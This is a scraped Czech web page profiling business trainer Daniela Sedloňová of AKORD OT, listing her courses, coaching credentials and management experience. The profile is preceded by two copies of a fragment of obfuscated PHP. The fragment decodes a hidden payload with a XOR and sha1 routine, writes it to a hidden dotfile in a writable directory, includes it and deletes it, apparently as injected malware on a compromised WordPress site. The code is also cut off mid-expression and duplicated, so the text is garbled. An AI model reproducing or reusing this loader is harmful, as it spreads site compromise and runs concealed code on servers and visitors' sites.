100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Daniela Sedloňová - AKORD OT
  • zaměřuje se na kurzy time managementu, prodejních, manažerských, komunikačních a prezentačních dovedností
  • působí jako byznys koučka (absolvovala Specifický kurz pro kouče MÚVS)
  • absolvovala magisterské studium na VŠO v Praze, stejně tak lektorský kurz
  • praktické zkušenosti nabyla během 12ti let na manažerských pozicích v mezinárodních společnostech v ČR i v zahraničí
  • 4 roky pracovala na manažerské pozici ve Velké Británii, kde získala CAE certifikaci (Cambridge Certificate in Advanced English), jíž zaručuje kvalitu kurzů a koučování v anglickém jazyce
  • jako Head of Regional Sales v HRS Group vedla multikulturní obchodní tým napříč státy střední a východní Evropy
  • připravuje interaktivní a energetické tréninky a workshopy jež propojují nejužitečnější teorii s praxí
  • ráda se neustále vzdělává a zajímá se o nejnovější poznatky ohledně fungování lidského mozku